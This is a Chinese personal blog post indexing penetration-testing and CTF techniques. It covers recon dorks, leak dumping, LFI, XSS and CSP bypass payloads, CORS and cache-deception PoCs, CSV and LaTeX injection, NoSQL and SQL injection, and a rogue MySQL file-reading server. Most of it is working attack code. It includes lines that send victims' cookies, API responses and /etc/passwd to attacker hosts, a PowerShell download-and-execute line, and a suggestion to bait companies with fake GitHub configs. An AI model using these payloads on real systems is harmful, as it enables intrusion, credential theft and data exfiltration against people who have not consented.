Vorder's blog

知识索引

索引 bypass cors xss bypass upload file webshell bypass md5文件伪造 flask session 命令执行bypass 反序列化 sqli bypass shellcode bypass
字数统计: 11.4k阅读时长: 60 min
2018/12/27 Share

声明:此文章为平时学习积累的知识索引,会大量引用大佬们的东西

并且会持续更新……

知识补充

备忘

1
2
3
4
#certutil
certutil -hashfile xxxx md5
#sqlmap
--prefix "' " --suffix " and 'r'='r"

docker备忘

docker save和docker export的区别

总结一下docker save和docker export的区别:

  1. docker save保存的是镜像(image),docker export保存的是容器(container);
  2. docker load用来载入镜像包,docker import用来载入容器包,但两者都会恢复为镜像;
  3. docker load不能对载入的镜像重命名,而docker import可以为镜像指定新名称。

密码学知识

md5

md5详解:https://github.com/corkami/pocs/blob/master/collisions/README.md

信息收集

https://4hou.win/wordpress/?p=31548

域名搜集

存在网站abc.com搜集下列网站信息

1
2
3
4
5
 abc-inc.com
*.corp.abc.com
*.intra.abc.com
abc-corp.com
abc-ltd.com

archive.org

http://web.archive.org/cdx/search/cdx?url=xxxxxxxxxxx.com/*&output=json&fl=original&collapse=urlkey

或者使用脚本
archives

google && github hack

1
2
3
4
5
6
7
8
9
10
11
site:Github.com smtp @qq.commit
site:Github.com root password


"xxxx.cn" API_key
"xxxx.cn" secret_key
"xxxx.cn" aws_key
"xxxx.cn" Password 
"xxxx.cn" FTP
"xxxx.cn" login 
"xxxx.cn" github_token

端口扫描

nmap -sS -O -sV -iL ~/Desktop/url.txt -p 20,21,22,23,24,25,53,67,68,69,79,80,81,82,83,84,85,86,87,88,89,109,110,111,137,138,139,143,161,210,389,443,465,512,513,514,546,873,993,994,995,1090,1091,1092,1093,1094,1095,1096,1097,1098,1099,1158,1352,1433,1434,1521,2049,2181,2222,2888,3306,3307,3308,3389,3690,3700,3888,4040,4100,4200,4443,4444,4445,4848,5000,5006,5432,5601,5632,5900,5901,5902,5903,5904,5905,6379,7001,7077,7180,7181,7182,8000,8480,8485,8888,9000,9080,9092,9300,9418,10000,10020,11211,18080,19888,50470,50475,60000,60010,60020,60030,9093,27017,27018,27019,50010,50011,50012,50013,50014,50015,50016,50017,50018,50019,50020,50021,50022,50023,50024,50025,50026,50027,50028,50029,50030,50031,50032,50033,50034,50035,50036,50037,50038,50039,50040,50041,50042,50043,50044,50045,50046,50047,50048,50049,50050,50051,50052,50053,50054,50055,50056,50057,50058,50059,50060,50061,50062,50063,50064,50065,50066,50067,50068,50069,50070,50071,50072,50073,50074,50075,50076,50077,50078,50079,50080,50081,50082,50083,50084,50085,50086,50087,50088,50089,50090,9094,9095,9096,9097,9098,9099,9100,9101,9102,9103,9104,9105,9106,9107,9108,9109,9110,9111,9112,9113,9114,9115,9116,9117,9118,9119,9120,9121,9122,9123,9124,9125,9126,9127,9128,9129,9130,9131,9132,9133,9134,9135,9136,9137,9138,9139,9140,9141,9142,9143,9144,9145,9146,9147,9148,9149,9150,9151,9152,9153,9154,9155,9156,9157,9158,9159,9160,9161,9162,9163,9164,9165,9166,9167,9168,9169,9170,9171,9172,9173,9174,9175,9176,9177,9178,9179,9180,9181,9182,9183,9184,9185,9186,9187,9188,9189,9190,9191,9192,9193,9194,9195,9196,9197,9198,9199,9200,9443,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,8001,8002,8003,8004,8005,8006,8007,8008,8009,8010,8011,8012,8013,8014,8015,8016,8017,8018,8019,8020,8021,8022,8023,8024,8025,8026,8027,8028,8029,8030,8031,8032,8033,8034,8035,8036,8037,8038,8039,8040,8041,8042,8043,8044,8045,8046,8047,8048,8049,8050,8051,8052,8053,8054,8055,8056,8057,8058,8059,8060,8061,8062,8063,8064,8065,8066,8067,8068,8069,8070,8071,8072,8073,8074,8075,8076,8077,8078,8079,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8161,8443,10001 -v -T4 -Pn -oA ~/Desktop/result

add

1
2
3
12001、12002、12003、8080、8090、3003
11111、62818、54467
49242

TCP SYN SCAN

https://xz.aliyun.com/t/5376

CDN

CDN绕过查找真实ip

https://vorders.me/2018/11/15/%E7%BB%95%E8%BF%87%E4%BA%91waf%E6%89%BE%E7%9C%9F%E5%AE%9Eip/

信息泄露

git泄露

  • SHA-1:hash大小为160位,计算长度为40位
  • 确定.git泄露存在与否,确认接收到请求是否为403(若为则存在)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
object对象
 ├──blob              #二进制块,存放数据。结构:blob [文件大小]\x00[文件内容]
 ├──tree              #存放层级关系。功能像文件夹,来管理文件和文件夹 # 例子:100644 blob 63c918c667fa005ff12ad89437f2fdc80926e21c    .gitignore
 │  ├──mode           #文件模式  100644表普通文件,100755表可执行文件,具体参考unix的文件模式
 │  ├──type           #对象类型 	
 │  ├──object         #指向文件的sha1签名
 │  └──file           #文件名
 ├──commit            #指向一个tree,包含描述信息
 │  ├──tree           #tree的sha1签名
 │  ├──parent         #上一步操作的历史记录(若没有则称之为root commit)
 │  ├──author         #创建人,包含提交日期	
 │  └──committer      #注释,描述修改
 └──tag               #标记commit,相当于版本号
    ├──object         #commit的sha1签名
    ├──type           #对象类型 	
    ├──tag            #标签名	
    ├──tagger         #标签创建人的名字
    └──signature      #签名信息,可略
  • Id(sha1编码过)的前2个字母是目录名,后38个字母是文件名。

对于sha1:d16ecb17678b0297516962e2232080200ce7f2b3存在以下目录:

1
http://xdsec-cms-12023458.xdctf.win/.git/objects/d1/6ecb17678b0297516962e2232080200ce7f2b3

详细内容查看:http://gitbook.liuhui998.com/1_2.html
文件模式查看:https://stackoverflow.com/questions/737673/how-to-read-the-mode-field-of-git-ls-trees-output
P牛对于git泄露的详解:https://www.leavesongs.com/PENETRATION/XDCTF-2015-WEB2-WRITEUP.html

svn 泄露

工具:

1
2
git clone https://github.com/admintony/svnExploit.git
python .\SvnExploit.py -u http://xx.xx.xx.xx/.svn --dump

BAZAAR 泄露

1
2
git clone https://github.com/SeahunOh/bzr_dumper
python3 dumper.py -u "http://127.1/" -o source

api key 泄露

api调用大全

阿里oss
地址:http://xxxxx.aliyuncs.com/

1
2
3
4
accessKeyId: 'xxx',
accessKeySecret: 'xxx',
bucket: 'xxx',
host: 'xxx'

使用ossbrowser进行连接

获取思路:

  • 公开的托管代码库中存放AccessKey(源码泄漏问题)
  • APK文件中的配置文件存放AccessKey(反编译后可搜索)
  • WEB应用中的配置文件存放AccessKey(低权限webshell可访问)

利用思路:

  • 第三方WEB管理平台
  • 本地管理工具(如ossbrowser、ossutil)
  • 编程调用官方提供的API

参考:https://www.cnblogs.com/xiaozi/p/11767841.html

漏洞挖掘

PHP

cms 漏洞挖掘
php 审计入门:https://xz.aliyun.com/u/10394

验证码漏洞

https://xz.aliyun.com/t/4984#toc-3

  • 验证码字符可控
  • 验证码使用后未销毁
  • 验证码存放位置暴露
  • 验证码使用弱加密
  • 验证码对比后未跳出/销毁
  • 验证码尺寸可控导致ddos

文件包含(LFI) bypass

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
./../
..;/
..././
...\.\
..\/

http://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini

. = %252e
/ = %252f
\ = %255c

%00   # php < 5.3.4

%252e%252e%252fetc%252fpasswd # 双编码

%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd   # utf-8 编码

../../#{more ../}../../etc/passwd      # 超大payload绕过,超过4096 byte

....//....//etc/passwd                  #添加干扰字符
..///////..////..//////etc/passwd
/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd

http://example.com/index.php?page=\\10.0.0.1\share\shell.php   # 当php中 allow_url_include 和 allow_url_fopen为OFF的时候可以包含smb下文件

php://filter/read=string.rot13/resource=index.php      # php伪协议
input://            
expect://id
phar://
data://
zip://

\\localhost\c$\windows\win.ini         # unc 绕过 

GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1       # 包含/proc/self/environ ,日志文件达到rce
User-Agent: <?=phpinfo(); ?>
/var/log/apache/access.log

fuzz: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/Intruder/deep_traversal.txt

文件包含全知识详解

zip或phar协议包含文件

适用于上传文件被强制追加后缀
如:
a.php->a.php.jpg
此时存在文件包含漏洞
上传一个zip压缩包(php.zip),里面文件为(a.php)
利用zip伪协议去包含文件
http://127.0.0.1/file.php?file=zip://php.zip.jpg%23a.php

https://bl4ck.in/tricks/2015/06/10/zip%E6%88%96phar%E5%8D%8F%E8%AE%AE%E5%8C%85%E5%90%AB%E6%96%87%E4%BB%B6.html

包含shell的临时文件如何寻找

  1. phinfo 查看文件临时保存地址/文件名
  2. window/linux通配符寻找

在linux中,每个进程都有一个PID,而/proc/xxx/下存放着与该进程相关的信息(这里的xxx就是PID)。/proc/xxx/下的cwd是软链接,self表示本进程。当我们通过访问Apache运行的网站时,/proc/self/cwd/就相当于apache的根目录,例如我本机Apache的根目录是/var/www/html

反序列化

PHP反序列化标识符含义

a - array
b - boolean
d - double
i - integer
o - common object
r - reference
s - string
C - custom object
O - class
N - null
R - pointer reference
U - unicode string

private属性需要在字段两边+%00
preg_replace()报错会返回NULL

常见魔术方法:

1
2
3
4
5
6
7
8
9
__construct()//创建对象时触发
__destruct() //对象被销毁时触发
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //用于从不可访问的属性读取数据
__set() //用于将数据写入不可访问的属性
__isset() //在不可访问的属性上调用isset()或empty()触发
__unset() //在不可访问的属性上使用unset()时触发
__invoke() //当脚本尝试将对象调用为函数时触发

详细:

https://xz.aliyun.com/t/3674#toc-0

php反射调用

https://www.cnblogs.com/youyoui/p/7300340.html

xpath 注入

工具:xcat

web缓存欺骗攻击

攻击三要素:

易存在漏洞的框架:

  • PHP
  • Django
  • ASP.NET # FriendlyURLs关闭时
  • Cloudflare
  • IIS ARR
  • NGINX #配置了缓存规则
1
2
3
4
1. attacker使用社工方式让victimer访问该页面: https://victim/messages/home/non-existent.css
2. victimer访问页面后,根据自己的凭证获取到信息 :https://victim/messages/home
3. 并且缓存在该页面: https://victim/messages/home/non-existent.css
4. 最后attacker访问该页面能获取到victimer信息 (https://victim/messages/home/non-existent.css)

poc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<html>
<head>
</head>
<body>
<script>
    var cachedUrl = 'https://www.【漏洞网站】.com/' + generateId() + '.css';
    const popup = window.open(cachedUrl);

    function generateId() {
        var content = '';
        const alphaWithNumber = 'QWERTZUIOPASDFGHJUKLYXCVBNM1234567890';

        for (var i = 0; i < 10; i++) {
            content += alphaWithNumber.charAt(Math.floor(Math.random() * alphaWithNumber.length))
        }
        return content;
    }

    var checker = setInterval(function() {
        if (popup.closed) {
            clearInterval(checker);
        }
    }, 200);
    var closer = setInterval(function() {
        popup.close();
        document.body.innerHTML = 'Victims content is now cached <a href="' + cachedUrl + '">here and the url can be saved on the hackers server</a><br><b>Full Url: ' + cachedUrl + '</b>'; 
        clearInterval(closer);
    }, 3000);

</script>
</body>
</html>

https://drive.google.com/file/d/0BxuNjp5J7XUIdkotUm5Jem5IZUk/view

xss

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
javas%0acript://%250aalert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
OnAuxClick=alert``
<svgonload=alert(1)//
-(confirm)(1)//
new Function`al\ert\`6\``;

setTimeout`\u0061lert\u0028document.domain\u0029`;
{onerror=alert}throw 1337
self[Object.keys(self)[5]]("1")

<img src='1' onerror\x00=alert(0) />      # bypass onxxxx blacklist
<object onbeforescriptexecute=confirm(0)>
<img src='1' onerror/=alert(0) />

"><svg/onload=confirm(1)>"@x.y             # email xss

""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]][(''+{})[5]+(''+{})[1]+((""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]])+"")[2]+(!1+'')[3]+(!0+'')[0]+(!0+'')[1]+(!0+'')[2]+(''+{})[5]+(!0+'')[0]+(''+{})[1]+(!0+'')[1]](((!1+"")[1]+(!1+"")[2]+(!0+"")[3]+(!0+"")[1]+(!0+"")[0])+"(1)")()

([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()

更多神奇编码alert:http://aem1k.com/aurebesh.js/#

x@x.com<--`<img/src=` onerror=alert(1)> --!>
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
<body onpageshow=a='a'+'lert',window[a](1)>

6666666"> <video hidden="hidden" onloadedmetadata="\u006aava\u0073cript:[1].find(\u0061lert)" src="http://www.runoob.com/try/demo_source/movie.mp4" ></video>
<details open ontoggle=$.getScript`//127.0.0.1:899/a.js`>
<details/open/ontoggle=alert`1`>
<marquee onstart=alert(1)>
<img src=x onerror=\u0061lert``>

<svg/onload="(new Image()).src='//baidu.com?+document.cookie'">

<img src=1 onerror=a="%2",location="javascr"+"ipt:aler"+"t"+a+"81"+a+"9">
<img src=1 onerror="javascript:window.onerror=alert;throw 1">
<img src=1 onerror=_=top;_.onerror=_["al"+"ert"];throw[2333] >

fcr1y" onmouseover=a="%2",location="javascr"+"ipt:aler"+"t"+a+"81"+a+"9" "lrtmk

<p id="wow" onfocus="alert(1)" contenteditable=""></p>               use tag #wow
<p style="animation-name:progress-bar-stripes" onanimationstart="alert(1)"></p> 在bootstrap引用
<div onpointerenter="alert(1)">11111 </div>

将"/"转义为"&sol;"(URLEncode后是%26sol;)
双重url编码

">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>-->&lt;svg onload=/*<html/*/onmouseover=alert()//>
# 多语言xss检测

更详细的bypass:https://medium.com/@man.shum546/xss-payload-2018-5271c5e3bbce

各种技巧

style xss

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
style animation引申
寻找css中使用animation的方法


如bootstrap中的
- spinner-grow
- spinner-border
- progress-bar-stripes

animation事件
- animationcancel
- onanimationstart
- onanimationend
- animationiteration

<p style="animation-name:spinner-grow" onanimationend="alert(1)"></p>

参考:https://developer.mozilla.org/en-US/docs/Web/API/HTMLElement

mxss
<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">

详细:https://research.securitum.com/dompurify-bypass-using-mxss/

绕jsonp

1
2
<script>function getdata(data){alert(JSON.stringify(data));}</script>
<script src="http://xxxx.com/?callback=getdata"></script>

1
<script/src=?url=alert(1)></script>

bypass xss auditor

1
%FF%FE%3C%00s%00c%00r%00i%00p%00t%00%3E%00a%00l%00e%00r%00t%00%28%001%00%29%00%3C%00/%00s%00c%00r%00i%00p%00t%00%3E%00

瞄点xss

1
2
<details open ontoggle="alert(1)">
id='a' contenteditable onfocus="alert(1)"#a

https://html5sec.org/#145
https://github.com/cure53/XSSChallengeWiki/wiki/Mini-Puzzle-1-on-kcal.pw

开启页面缓存 Pragma: cache
ie 11 对于强制json xss的bypass

1
2
3
4
5
6
7
8
低版本ie 不会的referer进行url编码

----会传送referer
https->https
http->https
http->http
----不会传送refer
https->http

http://www.qingpingshan.com/jb/javascript/184536.html

针对hidden 的xss

1
2
3
4
5
6
分为漏洞处在hidden前或后
前:
    可以覆盖type为其他的,`<input value="a" src=1 onerror=alert(1) type="image" type="hidden">`
后:
	只能通过间接的方式来触发,比如大家熟知的`'<input type="hidden" name="returnurl" value="" accesskey="x" onclick="alert(1)" />`,然后按shift+alt+x触发xss,但是还可以这样操作,无交互的触发xss,相比起来已经是无限制了,` style='behavior:url(?)'onreadystatechange='alert(1)' `
> https://blog.csdn.net/u014345860/article/details/77351760

20190429164404-f17af52a-6a5a-1.png

[+]location
p.jpg

1
2
3
<img src=x onerror=location="javascript:alert%281%29">
<img src=x onerror=location="javascr"+"ipt:al"+"ert%28docu"+"ment.co"+"okie%29">
<img src=x onerror=Function(location.hash.slice(1))()>#alert(1)

详细:

https://www.leavesongs.com/PENETRATION/use-location-xss-bypass.html

[+]//和\\绕过

但是要注意在windows下\本身就有特殊用途,是一个path 的写法,所以\\在Windows下是file协议,在linux下才会是当前域的协议

//test.com/1.js

1
unescape('%2f%2ftest.com%2f1.js')

[+]Ascii码绕过

<img src="x" onerror="eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))">

[+]过滤括号

<svg/onload="window.onerror=eval;throw'=alert\x281\x29';">

[+] 编码绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#html
%26%2397;lert(1)
<img src="1" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" />
<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe>
#UTF-16be
%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00
#UTF-8
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
> = %C0%BE = %E0%80%BE = %F0%80%80%BE
' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
" = %CA%BA
' = %CA%B9
#Unicode
%EF%BC%9E becomes >
%EF%BC%9C becomes <

[+] csp bypass

CSP Bypass

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
Check the CSP on https://csp-evaluator.withgoogle.com and the post : How to use Google’s CSP Evaluator to bypass CSP
Bypass CSP using JSONP from Google (Trick by @apfeifer27)

//google.com/complete/search?client=chrome&jsonp=alert(1);

<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"

More JSONP endpoints available in /Intruders/jsonp_endpoint.txt
Bypass CSP by lab.wallarm.com

Works for CSP like Content-Security-Policy: default-src 'self' 'unsafe-inline';, POC here

script=document.createElement('script');
script.src='//bo0om.ru/csp.js';
window.frames[0].document.head.appendChild(script);

Bypass CSP by Rhynorater

d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://yoursubdomain.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)

Bypass CSP by @akita_zen

Works for CSP like script-src self

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>

Bypass CSP by @404death

Works for CSP like script-src 'self' data:

<script ?/src="data:+,\u0061lert%281%29">/</script>

xss in markdown/SVG/XML/files

markdown

1
2
3
4
[a](javascript:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:window.onerror=alert;throw%201)

svg

1
2
3
4
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>

self-xss的利用

http://www.anquan.us/static/drops/web-14035.html

ctf中常见xss读文件

1
2
3
4
5
6
7
8
9
10
11
12
13
<svg/onload="
xmlhttp=new XMLHttpRequest();
xmlhttp.onreadystatechange=function()
{
    if (xmlhttp.readyState==4 && xmlhttp.status==200)
    {
        document.location='http://xxxxx/?'+btoa(xmlhttp.responseText);
    }
}
xmlhttp.open("POST","request.php",true);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("url=file:///etc/passwd");
">

CORS学习

bypass

1
2
Origin: null
unicode攻击

一般来说存在如下头,表示存在cors漏洞
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true

在Credentials为false的情况下,使用浏览器缓存绕过
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false

1
2
3
4
5
6
7
8
9
<html>
<script>  
var url = "https://api.a.com/x/wd?c=web";  
fetch(url, {    
    method: 'GET',    
    cache: 'force-cache'
    });
</script>
</html>

强烈推荐:

https://xz.aliyun.com/t/2745
https://github.com/amandakelake/blog/issues/62
结合例子:
https://www.freebuf.com/articles/web/158529.html

实战过程遇到的例子
给出验证poc
受害者先登录漏洞网站,攻击者诱导受害者运行下列代码/(通过配合xss 或 直接放自己服务器上让受害者访问网页)

1
2
3
4
5
6
7
8
9
10
11
12
<script type="text/javascript">  
var req = new XMLHttpRequest();
req.onload = reqListener;
var sendData = {"query":"query handleGetPersonalAssets {\n  getPersonalAssets {\n    phone\n    redAvailable\n    totalTickets\n    __typename\n  }\n}\n"};
req.open("POST","https://漏洞网站/api",true);
req.setRequestHeader('content-type', 'application/json');
req.withCredentials = true;
req.send(JSON.stringify(sendData));
function reqListener() {
location="http://自己服务器地址/?////////////="+this.responseText;
};
</script>

防御方式

https://blog.csdn.net/weixin_41646716/article/details/85070981

sockets 攻击

tool

默认本地监听8000端口
python ws-harness.py -u "ws://dvws.local:8080/authenticate-user" -m ./message.txt
message.txt填入模板,需要fuzz的地方使用[FUZZ]关键词
{"auth_user":"dGVzda==", "auth_pass":"[FUZZ]"}
和sqlmap联动
sqlmap -u http://127.0.0.1:8000/?fuzz=test

SSO 单点登录

SAML 注入

待续…….

OAuth

bypass

1
2
3
unicode攻击
@欺骗
\/

重定向到恶意地址来获取sso的token

1
https://www.example.com/signin/authorize?[...]&redirect_uri=https://localhost.evil.com

重定向支持解析html

1
https://www.example.com/signin/authorize?[...]&redirect_uri=<img src=1 onerror=alert()>

apk或ios应用反编译中包含OAuth私钥

思路扩展:

  1. client_id与redirect_uri绑定将不存在此漏洞(以腾讯为例client_id=1002723021为 xxx.com域名的服务id,此时遍历redirect_uri确定允许范围,一般为二级或三级域)

2.1 假设存在二级域的文件上传(由于是oss,不能上传webshell,只能上传html页面,在html页面写入重定向到自己服务器,自己服务器上能接收到referer信息,其中就能包含oauth token

2.2 Discuz 发帖在图片地址栏填入我们的恶意服务器,用来接收受害者code

参考: https://zhuanlan.zhihu.com/p/34252979

LaTeX 注入

1
2
3
4
5
6
7
8
9
10
11
12
\input{/etc/passwd}          #读文件
\include{password} 

\newwrite\outfile             #写文件
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile

\immediate\write18{env > output} #命令执行
\input{output}

\url{javascript:alert(1)}      #跨站脚本

csv 注入

examples:
UserId,BillToDate,ProjectName,Description,DurationMinutes 1,2017-07-25,Test Project,Flipped the jibbet,60 2,2017-07-25,Important Client,"Bop, dop, and giglip", 240 2,2017-07-25,Important Client,"=2+5", 240

1
2
3
4
5
6
7
8
9
10
11
12
13
# pop a calc
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+1)*cmd|' /C calc'!A0
=2+5+cmd|' /C calc'!A0

# pop a notepad
=cmd|' /C notepad'!'A1'

# powershell download and execute
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0

# msf smb delivery with rundll32
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1

no sql

待补充……

工具:https://github.com/codingo/NoSQLMap

认证绕过,使用$ne和$gt

1
2
3
4
5
6
7
8
username[$ne]=toto&password[$ne]=toto
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$gt": undefined}, "password": {"$gt": undefined}}

匹配密码长度:
username[$ne]=toto&password[$regex]=.{3}    
username[$ne]=toto&password[$regex]=md.{1}   
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}

盲注jio本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()

username='admin'
password=''
u='http://example.org/login'

while True:
  for c in string.printable:
    if c not in ['*','+','.','?','|', '#', '&', '$']:
      payload='?username=%s&password[$regex]=^%s' % (username, password + c)
      r = requests.get(u + payload)
      if 'Yeah' in r.text:
        print("Found one more char : %s" % (password+c))
        password += c

工具:https://github.com/youngyangyang04/NoSQLAttack

GraphQL 注入

1
2
3
4
5
6
7
8
9
10
query {
  teams(where:{_or:[{state:{_eq:soft_launched}}, {state:{_eq:soft_launched}}]}) {
    edges {
      node {
        id
        state
      }
    }
  }
}

mysql

tips

1
2
sleep() 等价于 benchmark()
mid()substring() 等价于 substr()

报错

1
2
3
4
5
6
mysql> select pow(2,1024);
ERROR 1690 (22003): DOUBLE value is out of range in 'pow(2,1024)'
mysql> select cot(0);
ERROR 1690 (22003): DOUBLE value is out of range in 'cot(0)'
mysql> select exp(710);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'

order by 盲注

1
2
3
4
5
6
7
8
9
10
11
select * from users where id=1 union select 1,2,'a' order by 3
# id 	user 	pass
#---------------------
# 1 	2 		a
# 1 	admin 	password
select * from users where id=1 union select 1,2,'z' order by 3
# id 	user 	pass
#---------------------
# 1 	admin 	password
# 1 	2 		z
然后对其逐位二分去确定值

参考: https://www.chabug.org/ctf/852.html

子查询

1
2
select `3` from (select 1,2,3 from union select * from users)x
select 1,(select `4` from (select 1,2,3,4 union select * from sys_config)a limit 1,1)

dns 通道的盲注

条件:

  • windows
  • 有file_priv权限,且load_file不被过滤
  • secure_file_priv 不为NULL
1
select load_file(concat('\\\\',(select hex(group_concat(table_name)) from information_schema.tables where table_schema=database()),'.xxxxx.ceye.io\\abc'))

参考: http://lawlietweb.com/2018/06/30/dnslogsqli/

mysql 客户端文件读取

详解:mysql 蜜罐

引申:
curl gopher mysql攻击

只要我们把这个恶意的服务开在 3306 端口上,自然会有全球各地的扫描器来光顾,不光能读到一些客户端文件,还能接收到很多各类后门挖矿 payload,不过这只是常规操作。
近两年来,各大厂商都开始做自己的 GitHub 代码监控,防止内部代码泄露,借着这一点,更猥琐的思路是在 GitHub 上传包含各大厂商特征的假代码,在其 MySQL 配置中加上我们恶意服务的地址和端口,这样当厂商监控到 GitHub 的代码,大概翻一下就可以发现配置文件中的数据库密码,一般人都会去连接一下,此时……

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#coding=utf-8 
import socket
import logging
logging.basicConfig(level=logging.DEBUG)

filename="/etc/passwd"
sv=socket.socket()
sv.bind(("",3306))
sv.listen(5)
conn,address=sv.accept()
logging.info('Conn from: %r', address)
conn.sendall("\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00")
conn.recv(9999)
logging.info("auth okay")
conn.sendall("\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00")
conn.recv(9999)
logging.info("want file...")
wantfile=chr(len(filename)+1)+"\x00\x00\x01\xFB"+filename
conn.sendall(wantfile)
content=conn.recv(9999)
logging.info(content)
conn.close()

https://github.com/allyshka/Rogue-MySql-Server
https://lightless.me/archives/read-mysql-client-file.html
https://xz.aliyun.com/t/3277#toc-5

sql bypass方法

1
2
3
4
5
6
7
///.js?
union /*!select%252a/
union/!/!select%201,2,3*/
union`select`
union%23aa%0a/!select–%01%0a/1,@$,3
set @s = 0x73686f77207461626c65733b;prepare t from @s;execute t;
and 使用 /***/ANd
  • 更改请求类型
    get参数改成上传参数
    使用上传包绕waf
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
POST /vulnerabilities/sql.php HTTP/1.1
Host: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100109 Firefox/61.0
Content-Type: multipart/form-data;boundary=---------------------------274591138927562

-----------------------------274591138927562
Content-Disposition: form-data; name="id"

100000
-----------------------------274591138927562
Content-Disposition: form-data; name="pk"

1111111111111 union 
-----------------------------274591138927562
Content-Disposition: form-data; name="Upload"

Upload
-----------------------------274591138927562--

  • 更改content-type头

    1
    2
    3
    4
    5
    POST /vulnerabilities/sql.php  HTTP/1.1
    Host: x
    Content-Type: multipart/form-data;boundary=---------------------------274591138927562

    id=1 union

  • chunked攻击

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
POST /vulnerabilities/sql.php HTTP/1.1
Host: 101.71.156.8:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Transfer-Encoding: chunked

2;
ip
4;
=127
3;
.1 
1;
|
2;
 d
2;
ir
14;
&Submit=Submit

常规

通过独有函数判断数据库类型

1
2
3
4
access asc chr len #access-functions #exists(select*from msysobjects)判定access数据库
mysql substring substr length
mssql char ascii len substring #mssql function str
oracle ascii chr length substr upper lower replace(x,old,new)

